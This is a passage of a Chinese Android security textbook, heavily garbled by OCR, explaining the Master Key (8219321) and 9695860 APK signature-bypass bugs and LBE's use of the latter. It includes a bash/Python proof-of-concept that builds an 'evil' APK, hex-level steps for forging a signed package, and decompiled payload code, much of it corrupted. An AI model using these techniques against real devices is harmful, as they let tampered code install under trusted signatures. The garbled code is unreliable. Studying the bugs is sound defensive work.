BufferedInputStream bin = new BufferedInputStream(rafs, 4096); 


byte[] hdrBuf = n 
for (inti = 0; i 


ew byte[CENHDR]: // Reuse the same buffer for each entry. 
< nunEntries; Hi) { 


ZipEntry newEntry = new ZipEntry (hdrBuf, bin); 
REntries put (newEntry. getName () newEntry) : 


zommon lines ... +102 
if (numEntries != to 


漏洞 修复 前 
Patch Set 1 19] 


talNunEntries || diskNumber != 0 || diskWithCentralDir (= 0) { 


throw new ZipException("spanned archives not supported"); 


i 


#/ Seek to the first 


CDE and read all entries. 


RAFStream rafs = new RAFStream(nRaf, centrallirÜffset): 
BufferedInputStream bin = new BufferedInputStream(rafs, 4096); 


byte[] hdrBuf = new 
for (int i=0; i < 
ZipEntry newEnt: 


byte[CENHDR]， // Reuse the same buffer for each entry. 
nunEntries; ++i) { 
ry = new ZipEntry hdrBuf, bin); 


String entryNane = newEntry. getName 0): 


if (mEntries put 


(entryName, newEntry) != null) [ 


throw new ZipException ("Duplicate entry пале: ^ + entryName); 


漏洞 修复 后 
图 20-9 漏洞 修复 前 后 的 对 比 


由 此 可 见 ， 在 漏洞 修复 前 Android 未 考虑 到 APK 压缩 文件 中 的 重复 entryName 问题 ， 这 样 恶意 软件 制 
作者 就 可 以 制作 特定 的 APK 包 绕 过 Android APK 包 证 书 认 证 。 


(2) 分 析 产 生 漏 洞 的 原因 


接 下 来 首先 看 定位 到 Local Header 中 的 Data 数据 的 过 程 ， 具 体 代 码 如 下 所 示 。 


off64 t dataOffset = localHdrOffset + 


kLFHLen + 
get2LE(IfhBuf + kLFHNameLen) + 
get2LE(IfhBuf + kLFHExtraLen); 
get2LE(IfhBuf + kLFHExtraLen); 
由 此 可 见 ，Data 的 偏 移 是 通过 如 下 格式 计算 获得 的 。 
Header 的 起 始 偏 移 +Header 的 大 小 〈 固 定 值 ) +Extra data 的 大 小 + 文件 名 的 大 小 


具体 如 图 20-10 所 示 。 


4 struct ZIPFILERECORD record[0] 


DOSTIME £rFileTime 
DOSDATE frFileDate 
uint frCrc 

uint frConpressedSize 
uint frifnconpressedSire 


ushort frExtrsFieldLengt 


enum COMPTYPE frCompression 


P char frSignature[4] 
—— = header 起 始 偏 移 
ushort frFlags 
— 


haadar 大 小 


[ushort ErFiIeNameLength | Extra dats 大 小 和 文件 名 大 小 


— —— 


char frFileName[23] 


20-10 计算 数据 


[0 Android 系统 安全 和 反 编译 实 必 


其 实 Java 在 获取 Data 偏 移 处 理 操作 ， 并 在 读 取 Extra data 的 长 度 时 已 经 预存 了 文件 名 在 File Header 中 
的 长 度 ， 具 体 实现 代码 如 下 所 示 。 

// We don't know the entry data's start position. 

I| All we have is the position of the entry's local 

// header. At position 28 we find the length of the 

// extra data. In some cases this length differs 

/i from the one coming in the central header. 


RAFStream rafstrm = new RAFStream(raf, 
entry.mLocalHeaderRelOffset + 28); 
DatalnputStream is = new DatalnputStream(rafstrm); 
int localExtraLenOrWhatever = 
Short.reverseBytes(is.readShort()); 
is.close(); 

/ Skip the name and this "extra" data or whatever it is: rafstrm.skip(entry.nameLength + localExtraLenOrWhatever); 

这 样 就 产生 了 Master Key 漏洞 ， 如 果 Local Header 中 的 FileNameLength 被 设置 为 一 个 大 数 ， 并 且 
FileName 的 数据 包含 了 原来 的 数据 ， 而 File Header 中 的 FileNameLength 长 度 不 变 ， 那 么 底层 C++ 运行 流程 
和 上 层 Java 的 运行 流程 会 不 一 致 。 具 体 过 程 如 下 所 示 。 

C++ Header 64k Name Data 


一 > 十 > 
length=64k classes.dex dex\035\A... dex\035\B... 
十 一 一 一 > + > + 一 一 一 -> 


Java Header 11 Name Data 

由 此 可 见 , 底层 C++ 的 执行 会 读 取 64KB 的 FileName 长 度 , 而 Java 层 由 于 是 读 取 file header 中 的 数据 ， 

FileName 的 长 度 依旧 是 11， 于 是 Java 层 校 验 签名 通过 ， 执 行 底层 就 会 执行 恶意 代码 。 

(3) 漏洞 修复 方案 
校 验 Local Header 和 File Header 中 的 FileNameLength 是 否 一 致 ， 具 体 实现 代码 如 下 所 示 。 

int length = Short.reverseBytes(raf.readShort()) & Oxffff; 

if (length != length.getint(entry)) 

throw new ZipException(); 
(4) POC 代码 


开源 РОС 的 地 址 是 https://gist.github.com/poliva/36b0795ab79ad6f14fd8， 具 体 代 码 如 下 所 示 。 
sl/bin/bash 

3t PoC for Android bug 8219321 by @pof 

# *info: https://jira.cyanogenmod.org/browse/CYAN-1602 
if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi 
APK-$1 

rm -r out out.apk tmp 2>/dev/null 

java -jar apktool.jar d $APK out 

#apktool d $APK out 

echo "Modify files, when done type 'exit"" 

cd out 

bash 

cd... 

java -jar apktool.jar b out out.apk 

#apktool b out out.apk 

mkdir tmp 

cd tmp/ 


e. 


зое puaa 0000 


unzip ../$APK 

mv ../out.apk . 

cat >poc.py <<-EOF 
3H/usr/bin/python 

import zipfile 

import sys 

z = zipfile.ZipFile(sys.argv[1], "a") 
z.write(sys.argv[2]) 

z.close() 

EOF 

chmod 755 poc.py 

for f in find . -type f Jegrep -v "(poc.py|out.apk)" ; do ./poc.py out.apk "$f" ; done 
cp out.apk ../evil-SAPK 

са.. 

rm -rf tmp out 

echo "Modified АРК: evil-SAPK" 


20.3.4 #9695860 漏洞 


序号 为 #9695860 的 漏洞 是 第 二 个 签名 漏洞 ， 在 Android master key (#8219321) 签名 漏洞 被 公布 之 后 ， 
国内 的 安全 团队 “ 安 卓 安全 小 分 队 ” 在 其 博客 Chttp://blog.sina.com.cn/u/3194858670) 中 声称 发 现 了 另外 一 
个 Android 签名 漏洞 。 不 久之 后 ，Cydia 创始 人 saurik 在 其 网 站 Chttp//www.saurik.com/) 上 发 布 文章 称 其 发 
现 了 利用 这 个 漏洞 的 好 方法 。 该 漏洞 〈 编 号 9695860) 的 主要 原理 是 ，Android 在 解析 ZIP 包 时 ，C 代码 和 
Java 代码 存在 不 一 致 性 : Java 将 short 整数 作为 有 符号 数 读 取 ， 而 C 将 其 作为 无 符号 数 。 


1. 原理 介绍 
了 解 该 漏洞 的 具体 细节 之 前 ， 需 先 要 了 解 ZIP 包 的 文件 结构 。 如 果 一 个 压缩 包 里 有 多 个 文件 ， 可 以 认 
为 每 个 文件 都 是 被 单独 压缩 成 一 个 包 ， 然 后 再 拼 成 一 个 大 ZIP 包 。 如 图 20-11 所 示 的 每 个 FileEntry 即 代表 
-个 压缩 后 的 文件 数据 。 


Relative offset 1 


Relative offset 2 
Relative offset 3 H 
| Relative offset n| | | 
+ 


t t t 
FILE FILE FILE FILE 
ENTRY1 ENTRY2 ENTRY3 ( ИТО ENTRYS CENTRAL 
LJ "~be 
Fie entry 3 
Local header 3 az 
File erty 1 
Local header 2 
1624 i Local header n 


20-11 ZIP 包 的 FileEntry 


CD 文件 头 : 在 ZIP 包 文件 末尾 ， 记 录 了 索引 段 的 偏 移 、 大 小 和 索引 个 数 等 。 
(2) RIB: 是 一 个 索引 的 数组 ， 每 个 索引 记录 了 其 在 数据 段 中 对 应 数据 的 信息 ， 包 括 CRC 和 偏 
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(3) 数据 段 中 的 数据 : 分 为 fileheader 和 压缩 的 文件 数据 。 


UU Android REG jo ERR 


O fileheader: 记录 了 数据 的 一 些 基 本 信息 ， 可 以 用 来 与 索引 段 中 记录 的 数据 比较 ， 从 而 检查 压缩 包 的 
完整 性 。 

О _ Data 区域: 是 文件 被 压缩 的 数据 存储 区 。 

通常 来 说 ， 读 取 一 个 ZIP 压缩 包 的 基本 步骤 如 下 所 示 。 

СТ) 定位 到 Header， 读 取 索 引 段 的 偏 移 、 大 小 和 索引 的 个 数 。 

(2) 定位 到 索引 段 ， 根 据 每 个 索引 中 字段 定义 的 大 小 计算 偏 移 ， 逐 个 读 取 索引 。 

(3) 根据 索引 中 记录 的 数据 段 的 偏 移 定位 到 真正 的 压缩 数据 。 

Android 校 验 APK 签名 的 功能 是 在 Java 层 处 理 实现 的 ，Java 解析 ZIP 的 文件 格式 ， 读 取 包 里 的 每 个 文 
件 ， 计 算 哈 希 进 而 校 验 签名 。Java 在 计算 ZIP 文件 结构 偏 移 时 ， 将 整数 作为 有 符号 数 读 取 却 没有 做 处 理 ， 
所 以 当 这 些 偏 移 的 大 小 符合 一 定 条 件 〈 大 于 32767) IF, Java 就 会 出 现 读 取 错 误 的 问题 。 例 如 ， 如 图 20-12 
所 示 的 情形 。 


ZipEntry ortet] harBut, Inpurserean in) throws Tosxcepeion { 
n, hdrBuf, 0, hdrBuf.length); 


or it = HeapBufferIterator.ireratcr(hdrBuf, 0, hdrBuf.length, 
t0; 


t 
xception("Central Directory Entry not found"); 


// These are 32- bit values in the file, but 64- bit fields in this object. 
crc = ((long) it.readI 

compressedSi: 
size = ((lon 


nameLength = ic readShort(); 
T 


图 20-12 读 取 错误 


在 上 述 代 码 中 ， 如 果 extraLength 大 于 32767 (Ox7FFF) ，Java 就 会 将 其 当成 负数 ， 所 以 Java 计算 下 一 
段 数 据 的 偏 移 时 就 会 出 错 。 安 卓 安 全 小 分 队 提 到 的 方法 是 ， 设 置 数 据 段 中 classes.dex 所 在 FileEntry 中 
FileHeader 的 extraLenth 值 为 0xXFFFD， 即 -3， 这 样 Java 计算 FileEntry 中 data 的 起 始 地 址 就 会 往 后 移 3 位， 
正好 指向 文件 名 中 的 dex, 而 dex 恰好 是 DEX 文件 头 的 魔术 字 ， 所 以 可 以 将 这 段 空间 作为 正常 DEX 的 数据 
段 ， 而 将 正确 偏 移 (0xFFFD， 即 65533) 指向 的 空间 写成 恶意 数据 。 这 样 Java 在 校 验 签名 时 读 取 的 是 正常 
的 DEX, ifi C 在 加 载 文件 时 读 取 的 是 恶意 的 DEX 文件 ， 如 图 20-13 所 示 。 


local fle header local fle header 
file name. fie name. 
(classes dex) 
extra field А 
orginal —: 
casos dex 1 
extra field i 


File dota лгы ын 
(classes dex) P d 


Filo data 
(hacked 
classes.dex) 


20-13 Ж DEX 文件 


зое япшаон N 


安 卓 安全 小 分 队 的 攻击 方法 是 针对 数据 段 做 修改 ， 但 是 无 符号 short 型 整数 的 最 大 值 是 64KB， 所 以 恶 
意 classes.dex 的 地 址 最 大 只 能 在 FileHeader+64KB 以 外 , 这 其 间 的 空间 供 正常 的 classes.dex 使 用 ， 所 以 这 就 
要 求 正常 DEX 的 大 小 不 能 超过 64KB， 因 为 要 求 文件 名 后 3 位 和 对 应 的 文件 头 都 是 DEX， 所 以 这 个 方法 只 
能 伪造 DEX。 

Saruik 发 现 Java 不 仅 在 处 理 数据 段 结构 体 时 存在 错误 ， 在 处 理 Central Directory 时 也 存在 类 似 错误 。 所 
以 可 以 对 索引 段 做 手脚 ， 伪 造 索引 。 

Java 在 读 取 Central Directory 时 ， 也 是 将 整数 做 有 符号 数 处 理 ， 不 过 不 同 的 是 如 果 发 现 值 小 于 0， 就 将 
其 忽略 ， 即 当 作 0， 如 图 20-14 所 示 。 


0, extraLength); 


图 20-14 忽略 小 于 0 


由 此 可 见 ， 只 要 大 于 32767 的 值 都 会 被 Java 当 作 0 来 处 理 。 这 样 就 可 以 修改 某 个 index CERE A) 的 
extraLength 值 大 于 0x7FFF， 然 后 紧 接 着 在 该 index 写 入 后 为 正常 的 index GE B) ， 而 真正 的 偏 移 处 写 入 
为 恶意 的 index ( 称 作 B') 。 然 后 修改 B 的 extraLength, 使 得 其 大 小 能 够 让 指针 指向 下 一 个 index GE С). 
这 样 一 来 ，Java 解析 时 读 到 的 是 ABC， 而 C 读 到 的 是 AB'C。 而 FileEntry 的 位 置 是 索引 段 指 向 的 ， 所 以 只 
要 索引 被 “劫持 ”， 就 可 以 在 ZIP 包 的 任意 位 置 写 入 恶意 数据 ， 然 后 让 B' 指 向 它 即 可 。 


2. 手动 打造 APK 


在 接 下 来 的 内 容 中 , 将 手动 打造 一 个 APK 文件 aa_1236.apk, 然后 利用 ANDROID-8219321 漏洞 (Master 
Key) 绕 过 Android 签名 校 验 。 
(1) 反 编 译 目标 APK 文件 ， 查 看 文件 AndroidManifestxml。 
«application android:label="@string/app_name" android:icon="@drawable/icon" android:name=".MyApplication"> 
(2) 在 MyApplication 的 smali 代码 中 , 在 OnCreate 入 口 位 置 添加 打印 log 信息 的 代码 。 有 具体 代码 如 下 
所 示 。 
#debug by sing 
const-string v1, "TAG" 
const-string v2, "log by sing" 
invoke-static (v1,v2) ,Landroid/util/Log;->d(Ljava/lang/String;Ljava/lang/String;)I 
#debug by sing 
具体 效果 如 图 20-15 所 示 。 


.method public onCreate()V 


«prologue 


fdebug by sing 

const-string vi, 
const-string 
invoke-static 
#debug by sing 


id/util/Log;-»d(Ljava/lang/String;Ljava/lang/String;)I 


20-15 添加 打印 log 信息 的 代码 
(3) 回 编译 成 第 二 个 АРК 文件 ， 成 功 则 证 明 修改 有 效 ， 安 装 并 运行 查看 log 信息 输出 如 图 20-16 所 示 


的 信息 ， 这 说 明 修 改 成 功 。 
89) 


Н Android REG jo RERO 


D 08-30 02:35:46.891 15297 15297 com.jiasoft.swreader TAG 
图 20-16 ”输出 的 log 信息 


(4) 将 第 二 个 APK 包 中 的 classes.DEX 文件 添加 到 原 目标 APK 包 的 原 classes.dex 前 面 ， 使 得 最 终生 
成 的 包 为 第 三 个 APK 包 ， 压 缩 包 结构 如 图 20-17 所 示 。 


名 称 

a. 

А assets. 

Ji ib 

点 META-INF 

b res 

四 AndroidManifestxml 

[ dasses.dex 
sses.dex 

25) CopyrightDeclarationxm! 

29 mmiap.xml 


log by sing 


resources.arsc 


20-17 ”压缩 包 结构 
(5) 重新 安装 修改 后 的 第 三 个 APK 包 ， 运 行 后 能 够 正常 输出 log 信息 ， 如 图 20-18 所 示 。 


Level Time PID TID Application Tag Text 
D 08-30 02:41:45.001 15464 15464 com.jiasoft.swreader TAG log by sing 


图 20-18 输出 log 信息 
此 时 执行 后 的 运行 界面 也 是 正常 的 ， 如 图 20-19 所 示 。 
(6) 接 下 来 只 要 把 目标 classes.dex 复制 一 份 并 修改 ， 按 照 上 述 方法 构造 一 个 APK 文件 即 可 绕 过 Android 
的 签名 系统 。 
3. 手动 构造 


继续 使 用 “手动 打造 APK” 部 分 的 APK 文件 ， 接 下 来 将 详细 讲解 手动 构造 这 个 APK 文件 的 方法 。 
CD 反 编 译 前 面 的 APK 文件 ， 修 改 代 码 后 回 编译 ， 并 测试 验证 修改 的 代码 可 以 正常 输出 log. 
(2) 解压 缩 APK 文件 ， 将 原 classes.dex 改名 为 classeorigin.dex， 把 修改 后 的 classes.dex 复制 到 解压 缩 
的 目录 。 打 包 成 ZIP 后 的 文件 结构 如 图 20-20 所 示 。 


B 5554AndroidyM 38 crackedzip - WinRAR (Жай) 
XHA SAO IAS) 收藏 突 (0) EA 


ə 5 Ë 
йш MES MZ =s M 
E B cracked.zip - ZIP нахе, же 
E 


4: META-INF 

E res 
LAndroidManifestxml 
|] dasseorigin.dex 


L dasses.dex 


resources.arsc 


20-19 运行 界面 正常 2020 ”打包 成 ZIP 后 的 文件 结构 


把 原 classes.dex 改名 为 classeorigin.dex 的 目的 是 ， 让 其 在 ZIP 包 中 的 顺序 排 在 classes.dex 之 前 。 
(3) 查找 DEX:50 4B 01 02， 即 Central directory file header 的 开头 ， 直 到 找到 含有 classeorigin.dex 的 上 
个 结构 ， 如 图 20-21 所 示 是 AndroidManifest.xml 文件 的 结构 。 


50 4B 01 02 1F 00 14 00 00 00 08 00 А2 98 ЗА 43 PK 
64 A2 1F 3C 94 02 00 00 FO 06 00 00 ЕЗ ОЕП ВТ 
оо оо 00 00 оо оо во оо O00 00 DB 92 00 00 41 6| 


图 20-21 AndroidManifestxml 文件 的 结构 


其 中 , 0013 是 文件 名 长 度 , 因为 AndroidManifest.xml 是 19 个 字符 。 后面 两 个 字 节 的 字段 就 是 Extra field 
length， 此 处 有 意 设置 为 0x8000, f# Java 代码 读 取 时 刚好 认为 是 负数 ， 使 其 按 0 处 理 。 这 说 明 后 面 需要 
紧 跟着 一 个 Central directory file header 结构 。 

(4) 因为 在 签名 校 验 中 需要 验证 classes.dex， 而 不 是 classeorigin.dex， 所 以 需要 把 文件 名 还 原 回 去 ， 多 
出 的 5 个 字 节 刚好 填 在 Central directory file header 结构 的 File comment length 字段 ,最 后 随便 填写 注释 内 容 。 

(5) 从 包含 AndroidManifest.xml 的 Central directory file header 结构 末尾 算 起 ， 加 上 0x8000 大 小 (中 
间 包 含 了 原 DEX 的 结构 ) 后 是 修改 后 的 DEX 结构 ， 如 图 20-22 所 示 。 


00 50 4B 01 02 1F 00 14 00 00 00 08 00 DC 53 5C . 
43 40 CB 32 OB 36 67 02 00 1C 98 05 00 [0B 00| р0) 

[00]00 00 00 00 00 00 20 00 00 00 FB EB 02 00 63 
6С 61 73 73 65 73 2E 64 65 78 50 4В 01 02 1F 00 
14 00 00 00 08 00 15 76 08 43 E2 85 62 B2 98 02 
00 00 A4 08 00 00 OE 00 24 00 00 00 00 00 00 00 
80 00 00 00 SA 53 05 00 72 65 73 ВЕ 75 72 63 65 
73 2Е 61 72 73 63 0A 00 20 00 00 00 00 00 01 00 
18 00 00 81 ЕЗ 51 03 94 CE 01 25 OD 06 FC A6 D3 
СЕ 01 25 OD 06 ЕС A6 D3 СЕ 01 50 4B 01 02 1F 00 i 


图 20-22 修改 后 的 DEX 结构 


后 面 的 结构 是 其 他 文件 的 正常 结构 ， 无 须 修改 。 


(6) 在 C 语言 代码 中 ， 识 别 的 压缩 文件 结构 如 下 所 示 。 
...AndroidManifest.xml->#% Ua BY Dex->resources.arsc... 


但 是 为 了 绕 过 签名 校 验 ， 需 要 让 Java 代码 中 识别 的 压缩 结构 如 下 所 示 。 

.…AndroidManifest.xml-> 原 Dex->resources.arsc... 

所 以 接 下 来 需要 把 原 DEX 结构 的 Extra field length 字段 跳 过 修改 的 DEX 结构 ， 使 得 下 一 个 Central 
directory file header 结构 是 resources.arsc 的 结构 。 此 处 的 Extra field length 不 能 再 超过 0x7FFF， 这 也 是 在 开 
始 要 将 原 classes.dex 改名 为 classeorigin.dex， 使 得 多 出 儿 个 字 节 的 原因 。 图 20-21 中 的 原 DEX 结构 的 Extra 
field length 字段 是 0x7FFB。 

CD 最 后 一 步 修改 Zp 文件 尾 ， 如 图 20-23 所 示 。 开 始 修 改 文件 个 数 ， 将 15 改 为 14〈 因 为 隐藏 了 一 个 
文件 ) Central directory file header 所 有 目录 的 大 小 也 要 修改 〈 只 要 拿 尾 部 标记 的 地 址 减 去 Central directory 
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file header 结构 的 起 始 地 址 即 可 ) 。 


EO 48 05 06]00 оо оо оо [14 0OJI4 OU]RI 87 UU UU] РК..........!!.. 
20-23 ”修改 Zp 文件 尾 
最 后 的 APK 文件 结构 如 图 20-24 所 示 ， 里 面 的 classes.dex 是 修改 后 的 DEX 文件 。 


Ü, S cracked.apk - ZIP + AE 
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Ji META-INF 

b res 

3 AndroidManifest.xml 


L| elasses.dex 


| ]resources.arsc 


20-24 最 后 的 APK 文件 结构 


测试 安装 并 运行 APK 文件 后 可 以 成 功 绕 过 签名 并 输出 log， 如 图 20-25 所 示 ， 这 说 明 运 行 的 是 修改 后 
的 DEX。 


10-28 07:17:53.883 768 768 com.example.helloapplication TAG log by sing 
图 20-25 成 功 绕 过 签名 并 输出 log 


由 此 可 见 ， 和 前 面 介绍 的 Master key 漏洞 相 比 ，#9695860 漏洞 的 通用 性 和 人 危害 性 更 强 ， 具 体 说 明 如 下 
所 示 。 
О 不 需要 APK 包 里 有 同名 文件 ， 儿 乎 可 以 往 APK 里 添加 任何 文件 。 

Q ”因为 修改 的 是 索引 段 , 通常 的 压缩 软件 用 的 是 C 读 取 压 缩 包 的 方法 , 只 要 恶意 索引 的 名 称 不 太 明显 ， 
就 很 难看 出 该 压缩 包 是 非法 算 改 的 ， 所 以 隐蔽 性 很 高 。 
а 因为 需要 解析 ZIP 文 件 结构 里 特定 属性 的 值 才 能 判断 APK 是 否 非 法 ， 所 以 检测 的 难度 也 相对 更 高 。 


20.8.5 LBE 手机 安全 大 师 对 #9695860 漏洞 的 修复 


LBE 在 V5.1 版 本 中 增加 了 “ 免 ROOT” 的 功能 ， 可 以 在 不 ROOT 的 情况 下 实现 ROOT 后 才 有 的 功能 ， 
Жш, RRA, EDH. LBE 的 免 ROOT 功能 是 利用 Android 签名 验证 漏洞 (编号 9695860) ff 
换 了 系统 应 用 SettingsProvider, 然后 在 SettingsProvider 进程 里 以 System 权限 加 载 执 行 LBE 自己 的 功能 模块 ， 
达到 ROOT 后 才能 实现 的 功效 。LBE“ 免 ROOT” 实 现 的 主要 步骤 如 下 所 示 。 

(1) 开启 LBE 的 “ 免 ROOT 启动 ”主动 防御 ，LBE 系统 会 提示 用 户 修复 MasterKey 漏洞 ， 如 图 20-26 
所 示 。 

(2) 如 果 用 户 同 意 修复 ，LBE 会 连接 到 服务 器 端 下 载 所 在 系统 SettingsProvider 对 应 版 本 的 补丁 到 
/data/data/com.lbe.security/files/lbe_patch， 然 后 安装 。 安 装 完毕 后 ， 提 示 重 启 ， 重 启 后 即 可 实现 免 ROOT X 
动 防御 功能 ， 如 图 20-27 所 示 。 

(3) 开始 安装 lbe_patch， 补 丁 文件 lbe_patch 是 一 个 修改 过 的 SettingsProvider 安装 包 。 在 安装 过 程 中 
利用 了 Android 签名 验证 漏洞 #9695860， 会 覆盖 系统 自 带 的 SettingsProvider。 如 图 20-28 所 示 。 
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< LBE 安 全 大 师 


统 存 在 MasterKey 


MasterKey 高 危 测 洞 使 得 黑客 能 够 将 任意 
应 用 变 为 木马 ， 在 您 未 察觉 的 情况 下 完全 


控制 您 的 手机 ， 窃 取 隐 私 和 吸 费 等 Icom. Ibe. security config.json 


LBE Master Key TERN T EE ЕРЕЕН os he security virus: ok 


的 手机 免疫 此 漏洞 ， 此 补丁 可 脱离 LBE 安 
全 大 师 独立 运行 


免 ROOT 主 动 防御 服务 需要 您 首先 修复 此 漏 
洞 ， 请 先 修复 此 漏洞 


Irootfree 
图 20-26 ”提示 用 户 修复 MasterKey 漏洞 图 20-27 下 载 补丁 
File fLbePatch = this.getFileStreamPath("lbe patch"); 


if(!fLbePatch.exists()) ( 
return; 


) 


viewIntent = new Intent ("android.intent.action.VIEW"); 

viewIntent.setDataAndType (Uri.fromFile(fLbePatch), "application/vnd.android.package-archive"); 
PackageManager v3 = this.getPackageManager() ; 

packageInstaller = null; 

Iterator v4 = v3.queryIntentActivities(viewIntent, 0).iterator(); 


while(true) ( 
label 21: 
if(v4.hasNext()) ( 
v0 2 = v4.next(); 
if(((ResolveInfo)vO 2).activityInfo == null) [ 
continue; 
) 


if(! ((ResolveInfo)vO 2) .activityInfo.packageName. equals ("com.android.packageinstaller")) { 
goto label 44; 


) 
} 
else { 

goto label_23; 
} 


goto label 24; 


= packageInszaller; 


if(vo 2 te null) ( 
vievIntent.setComponent (new Com 
1 


)và 2).activitylafo.packageame, (№ )vó 2) .activityInfo.pame)]: 


this, startActivity(vievIntent): 


图 20-28 ”覆盖 系统 自 带 的 SettingsProvider 


(4) 从 如 图 20-29 所 示 的 Ibe patch 的 文件 结构 可 以 看 出 ，CERT.RSA 的 Comment 大 小 被 设置 为 0x8000， 


这 样 会 使 Java 在 解析 lbe_patch 时 ， 当 处 理 完 certrsa 这 个 central directory 后 会 紧 跟着 解析 后 续 的 central 


director， 而 C++ 则 跳 转 到 0x8000 后 的 地 址 解析 。 


МЕ Android RE paita 
4 struct ZIPDIRENTRY dirEntry[T] META-INF/CERT. RSA 12661h 
enum SignatureTYPE deSignature S ZIPDIRENTRY (2014B50h) 12661h 
b struct VERECORD deVersionladeBy Yer 2.0, 0S FAT 12665h 
> struct VERECORD deVersionloExtract Ver 2.0, 05 FAT 12667 
enum FLAGTYPE deFlags 2058: FLAG DescriptorUsedlMask, FLAG Utf8 — 12669h 
enum COMPTYPE deCompression COMP DEFLATE (Bh) 1266Bh 
DOSTIME deFileTime 17:07:36 1266Dh 
DOSDATE deFileDate 10/15/2013 1266Fh 
uint deCre SOT2FADFh 12671h 
uint deCompressedSize 484h 128T5h 
uint delnconpressedSire BB2h 12679h 
ushort deFileNameLength ilh 1267Dh 
raFieldLength Oh 1267Fh 


12681h 
a. Star! R 12683h 
ushort deInternalAttributes Oh 12685h 
enum FILEATTRIBUTE deExternalAttributes 0х0: 1268Th 
20-29 lbe patch 的 文件 结构 
在 验证 签名 时 ，PackageParserjava 将 Ibe patch 解析 成 如 图 20-30 所 示 的 结构 。 
+ 名 称 大 小 твавхл 类 型 
b LEER) 
| SPEGsbv86B окв 0 KB xx 
bres 8.51 KB 7.17 KB RER 
点 META-INF 2.32 KB 165KB Xxx 
| BjZCSjvUkhzqFFMOTss окв OKB Xx 
Lj resources.arsc 10.82 KB 298KB ARSC 文件 
图 20-30 Ibe patch 解析 成 的 结构 
而 C++ 会 将 其 解析 成 如 图 20-31 所 示 的 结构 。 
m Ab Бах BER J 
„нав 
Bres 8.51 KB 7.17 KB Xx 
点 META-INF 2.32 KB 1.65 KB Xx 
| resources.arsc 10.82 KB 2.98 KB ARSC 文件 
Ldasses.dex 57.30 KB 28.47 КВ DEX Zí 
"JJAndroidManifest.xml 2.27 KB 1KB XML 文件 
图 20-31 “C++ 解析 成 的 结构 
对 比如 图 20-32 所 示 的 系统 自 带 的 SettingsProvider 包 的 结构 。 
OO- Ø E ~ A settingsProvider 4.2.2.apk 
+ 名 称 хх) вав sm 修改 时 间 
k ERB) 
È res 21.64 KB. 20.72 KB Xx 
4: META-INF 2.95 KB 185KB Xx 
| jresources.arsc 11.80 KB. 11.80KB ARSC 文件 2008-04-15 23:40:50 
司 AndroidManifestxml 1.87 KB 1 KB XML 文件 2008-04-15 23:40:50 


图 20-32 系统 自 带 的 SettingsProvider 包 的 结构 


通过 对 比 可 以 看 到 ，Java 解析 lbe_patch 后 的 变化 有 两 个 : 一 是 新 增 了 随机 命名 的 两 个 文件 夹 ; 二 是 缺 
少 了 文件 AndroidManifestxml。 那 Ibe patch 是 怎么 绕 过 Android 签名 验证 的 呢 ? 文件 PackageParser.java 在 
验证 JarEntry 时 的 签名 代码 如 图 20-33 所 示 。 


e. 


final String name = je.getName(); 


if (name.startsHith|"META-INF/")) 
continue; 


if (ANDROID 


›; 


, readBuffer); 


weSourcePath + = entry ”+ je.getName) 


Slog.e(TAG, "Package ”+ pkg.packageName 
+ * has no certificates at entry " 
tName() + "; ignoring!"); 


ackageManager.INSTALL PASSE FAILED NO CERTIFICATES; 


ТГ Ensure all certificates match. 
for (int i-0; iccerts.length; i++) ( 


图 20-33 验证 JarEntry 时 的 签名 代码 


从 图 20-33 所 示 的 代码 中 可 以 得 出 如 下 两 条 结论 。 

0 PackageParser 会 直接 略 过 文件 夹 的 签名 验证 ， 所 以 新 增 的 两 个 文件 夹 不 会 对 签名 校 验 有 影响 ， 其 作 
用 是 保证 Java 解 析 CentralDirectory 的 个 数 达 到 ZipEndLocator 中 记录 的 CentralDirectory 的 个 数 ， 这 两 
个 文件 夹 正好 用 来 冲抵 AndroidManifestxml 和 classes.dex。 

OQ 验证 签名 时 ，PackageParser 会 遍历 APK 里 的 每 个 ZipEntry， 获 得 其 校 验 值 ， 然 后 和 APK 的 meta-inf 
中 存储 的 每 个 文件 的 校 验 值 做 比较 ， 不 难 发 现 ， 缺 少 的 文件 不 会 做 比较 ， 不 会 影响 签名 的 校 验 。 所 
以 lbe_patch 在 Java 层 解析 时 虽然 缺少 AndroidManifestxml， 但 是 签名 验证 还 是 可 以 通过 。 

C5) 此 时 安装 lbe_patch 成 功 ， 而 实际 在 运行 中 调用 的 是 C++ 层 解 析 后 的 安装 包 ， 在 里 面包 含 了 
classes.DEX 文件 和 AndroidManifestxml 文件 。 其 中 在 文件 AndroidManifest.xml 中 记录 了 patch version, 在 
安装 校 验 时 会 新 注册 一 个 com.lbe.security.mkservice 服务 ， 此 服务 供 LBE 后 续 调 用 ， 如 图 20-34 所 示 。 

(6) 文件 Classes.dex 的 代码 结构 如 图 20-35 所 示 。 


8-88 Reflection 
& 8 com 
9-88 android.providers.settings 
日 出 Ibesecurity 
® @ service.core 
5-8 utility 
由 国 IpUnkedstringHashMap 
®-[Й IPLongSparseArray 
由 - 国 IPLongSparseArraylnt 
H-D IPSparseArray 


8-0 а 

орь 

sD e 

由 - 国 d 

De 

8-0 # 

апігоіа те="1 ВЕ PATCH VERSION" android:value-"1" /> 8-09 

indroid:name-"com.lbe.security.MkService" android: 8-0 һ 
enabled-"true" android:exported-"true" /» 富国 MkPayload 


Æ 20-34 新 注册 一 个 com.Ibe.security.mkservice 服务 图 20-35 文件 Classes.dex 的 代码 结构 


和 反 编 译 实战 


由 此 可 以 看 到 在 里 面包 含 了 com.android.providers.settings 代码 。MkPayload 是 lbe_patch 的 入 口 类 , 里 
面包 含 了 主 函 数 main0 实 现 初始 化 、 反 射 调 用 和 加 载 主 防 等 模块 功能 ， 具 体 如 图 20-36 Bros 


public static final void main() [ // has try-catch handlers 
try { 
Log.i("LBE-Sec", "LBE Master Key Patcher version 1 successfully loaded"); 
MkPayload.b = ActivityIhread.mSystemContext.get(); 
MkPayload.c (MkPayload.b); 
1 
catch (Т! able v0) { 
v0.printStackIrace(); 
} 


E] 20-36 主 函 数 main() 


EXE XE Ж main() 何 时 被 调用 呢 ?LBE 修改 了 com.android.providers.setting 的 实现 代码 ， 设 置 在 
SettingsProvider 的 构造 函数 中 调用 了 这 个 main0 函 数 ， 所 以 LBE 的 代码 会 和 SettingsProvider 一 起 被 加 载 执 
行 ， 具 体 如 图 20-37 所 示 。 


public SettingsProvider() { 
MkPayload.main(); 
super(); 
this.mOpenHelpers = new Spars 


ВА 20-37 ”加 载 执行 主 函数 main() 


